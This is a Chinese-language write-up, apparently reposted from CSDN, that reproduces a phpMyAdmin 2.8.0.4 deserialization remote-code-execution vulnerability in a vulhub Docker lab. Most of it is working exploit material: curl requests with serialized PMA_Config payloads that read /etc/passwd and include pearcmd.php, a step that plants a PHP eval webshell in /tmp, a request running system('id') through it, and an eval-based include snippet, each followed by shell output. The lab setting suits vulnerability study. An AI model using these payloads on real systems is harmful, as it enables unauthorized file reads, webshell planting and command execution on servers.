欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 健康 > 美食 > WooYun-2016-199433 -phpmyadmin-反序列化RCE-getshell

WooYun-2016-199433 -phpmyadmin-反序列化RCE-getshell

2024/11/30 14:39:30 来源:https://blog.csdn.net/qq_29060627/article/details/139567473  浏览:    关键词:WooYun-2016-199433 -phpmyadmin-反序列化RCE-getshell

参考资料:

Phpmyadmin 脚本/设置.php反序列化漏洞 (WooYun-2016-199433)复现_phpmyadmin scriptssetup.php 反序列化漏洞-CSDN博客  https://blog.csdn.net/haoxue__/article/details/129368455利用pearcmd.php文件包含拿shell(LFI)_pearcmd文件包含-CSDN博客 https://blog.csdn.net/m0_62422842/article/details/126772725

靶场地址:

​https://github.com/vulhub/vulhub​
cd vulhub/phpmyadmin/WooYun-2016-199433;docker compose up -d;   
docker ps -a ;
root@fv-az1435-87:/tmp# docker ps -a
CONTAINER ID   IMAGE                       COMMAND                CREATED          STATUS          PORTS                                   NAMES
1f107fac7737   vulhub/phpmyadmin:2.8.0.4   "apache2-foreground"   54 minutes ago   Up 54 minutes   0.0.0.0:8080->80/tcp, :::8080->80/tcp   wooyun-2016-199433-web-1
root@fv-az1435-87:/tmp# 

测试包含:

curl -v -d "action=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}" "http://192.168.111.1/scripts/setup.php"

靶场环境存在 /usr/local/lib/php/pearcmd.php,并且开启了register_argc_argv选项

PHP Version 5.4.45
win10x64下:curl.exe -v -d "action=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:30:\"/usr/local/lib/php/pearcmd.php\";}" "http://192.168.111.1/scripts/setup.php?+config-create+/&f2=64&/<?=@eval($_REQUEST\[9\]);?>+/tmp/99"

 现在/tmp/99产生了:

root@1f107fac7737:/tmp# cat 99
#PEAR_Config 0.9
a:11:{s:7:"php_dir";s:43:"/&f2=64&/<?=@eval($_REQUEST[9]);?>/pear/php";s:8:"data_dir";s:44:"/&f2=64&/<?=@eval($_REQUEST[9]);?>/pear/data";s:7:"www_dir";s:43:"/&f2=64&/<?=@eval($_REQUEST[9]);?>/pear/www";s:7:"cfg_dir";s:43:"/&f2=64&/<?=@eval($_REQUEST[9]);?>/pear/cfg";s:7:"ext_dir";s:43:"/&f2=64&/<?=@eval($_REQUEST[9]);?>/pear/ext";s:7:"doc_dir";s:44:"/&f2=64&/<?=@eval($_REQUEST[9]);?>/pear/docs";s:8:"test_dir";s:45:"/&f2=64&/<?=@eval($_REQUEST[9]);?>/pear/tests";s:9:"cache_dir";s:45:"/&f2=64&/<?=@eval($_REQUEST[9]);?>/pear/cache";s:12:"download_dir";s:48:"/&f2=64&/<?=@eval($_REQUEST[9]);?>/pear/download";s:8:"temp_dir";s:44:"/&f2=64&/<?=@eval($_REQUEST[9]);?>/pear/temp";s:7:"bin_dir";s:39:"/&f2=64&/<?=@eval($_REQUEST[9]);?>/pear";}root@1f107fac7737:/tmp# 
root@1f107fac7737:/tmp# 

包含一下/tmp/99;

curl.exe -v -d "9=system('id>/tmp/aa');&action=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:7:\"/tmp/99\";}" "http://192.168.111.1/scripts/setup.php"

root@fv-az1435-87:/tmp/GG/vulhub/phpmyadmin/WooYun-2016-199433# docker exec -it wooyun-2016-199433-web-1   bash  -c "ls -al /tmp/;"
total 228
drwxrwxrwt 1 root     root      4096 Jun  9 14:55 .
drwxr-xr-x 1 root     root      4096 Jun  9 14:06 ..
-rw-r--r-- 1 www-data www-data   758 Jun  9 14:55 99
-rw-r--r-- 1 www-data www-data    54 Jun  9 14:40 aa
drwxr-xr-x 3 root     root      4096 Dec  5  2015 pear
-rw------- 1 www-data www-data 14030 Jun  9 14:54 sess_-xzY6DpaK7G8hKYxauffrFAmzse
-rw------- 1 www-data www-data 14039 Jun  9 14:17 sess_75ba4a73674a742f2ccc11cc48c2f05e
-rw------- 1 www-data www-data 14030 Jun  9 14:39 sess_J0l,w9cItGOD2Om08xJken1BvNd
-rw------- 1 www-data www-data 14030 Jun  9 14:40 sess_MFQSBU,ForArPhMNA0G18OnI5xe
-rw------- 1 www-data www-data 14030 Jun  9 14:51 sess_YhAKlcQJ9IIS0HTcKtrK1sjvJN4
-rw------- 1 www-data www-data 14030 Jun  9 14:10 sess_e-E6h8FuTt8hMZak2dyCJdT3fbc
-rw------- 1 www-data www-data 14030 Jun  9 14:38 sess_yB-Gdq7zLK45nKw19XED4mlt198
root@fv-az1435-87:/tmp/GG/vulhub/phpmyadmin/WooYun-2016-199433# 

测试代码:

echo "<?php
eval('?>'.file_get_contents(\$_GET['f']));
">/var/www/html/5.phpcurl -v "http://127.0.0.1/5.php?+config-create+/&f=/usr/local/lib/php/pearcmd.php&/<?=@eval(\$_REQUEST\[9\]);?>+/tmp/77"

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com